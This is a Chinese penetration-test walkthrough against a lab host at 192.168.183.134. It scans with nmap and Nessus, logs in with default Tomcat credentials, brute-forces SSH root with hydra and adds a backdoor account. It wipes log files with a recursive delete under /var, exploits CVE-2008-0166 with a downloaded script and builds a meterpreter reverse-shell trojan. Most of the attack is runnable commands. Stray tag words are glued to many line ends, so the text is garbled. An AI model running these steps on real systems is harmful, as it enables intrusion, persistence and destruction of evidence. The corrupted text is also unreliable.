1對局域網進行主機發現掃描:php
nmap -sP 192.168.183.0/24html
2肯定攻擊目標:本機ip地址爲129,內網中還存在另外一臺主機,ip爲134,這就是咱們的目標,咱們對它進一步掃描。python
nmap -sV 192.168.183.134mysql
經過分析,咱們發現:目標主機開啓大量可利用端口,ftp、ssh、telnet、smtp、mysql能夠進行暴力破解,對方主機也開啓了80端口,apache版本爲2.2.8,php版本爲5.2.4。linux
3放大招,使用nessus進行漏洞掃描。web
4在web掃描這裏,我發現一些嚴重漏洞,這一個能夠直接登錄進去:sql
在這裏,咱們發現如下信息:shell
網址:http://192.168.183.134:8180/manager/htmlapache
用戶名:tomcatubuntu
密碼:tomcat
網址:http://192.168.183.134:8180/host-manager/html
用戶名:tomcat
密碼:tomcat
網址:http://192.168.183.134:8180/manager/status
用戶名:tomcat
密碼:tomcat
好像發現了新大陸,咱們繼續尋找可用信息。
咱們發現管理員路徑爲admin:
好像沒太大用,因爲時間比較緊,咱們進行下一步。
經過分析上一步的掃描結果,分析獲得如下信息:
找到漏洞編號:
CVE: CVE-2009-3099, CVE-2009-3548, CVE-2010-0557, CVE-2010-4094
繼續尋找以前nessus的掃描結果,找到如下內容:
找到漏洞編號:
找到漏洞編號,cve-2008-0166
在掃描期間,咱們先用hydra暴力破解試試,說不定運氣好呢。
hydra -l root -P pass.txt –t 50 -e ns192.168.183.134 ssh
最開始使用上面命令,總是出現could not connect to target,查詢了發現時由於線程開太多,被對方封了,因此改爲1就能夠正常運行。
hydra -l root -P pass.txt -t 1 -vV192.168.183.134 ssh
Success: 'root':'ubuntu' 仍是root權限,接下來,直接用xshell鏈接就行了。
(5)建立帳戶
Useradd hack
Passwd hack
123
123
(6)清除日誌文件
find /var -type f -exec rm -v {} \;
經過暴力破解,咱們已經得到對方shell,這樣好像有點簡單。我想繼續根據以前獲取的信息進行攻擊。
Msfconsole搜索,發現並無:
找到cve官網關於本漏洞的說明:
直接下載利用說明:
根據文檔內容進行操做:
首先下載密鑰文件:
上傳到bt5並解壓:
使用/pentest/exploits/exploitdb/searchsploit openssl搜索利用腳本文件:
咱們隨表找一個,我這裏使用python腳本。
find / -name 5720.py
進入/pentest/exploits/exploitdb/platforms/linux/remote/,並執行破解:
python 5720.py /root/rsa/2048192.168.183.134 root
結果以下:
執行:
ssh -lroot -p22 -i/root/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 192.168.183.134
成功獲取對方shell。
生成木馬:
msfpayload linux/x86/meterpreter/reverse_tcpLHOST=192.168.183.129 LPORT=55555 X > runme
將木立刻傳至目標主機:
在攻擊機中開啓服務端:
若是目標機不當心運行了木馬文件,攻擊機便可得到反彈shell。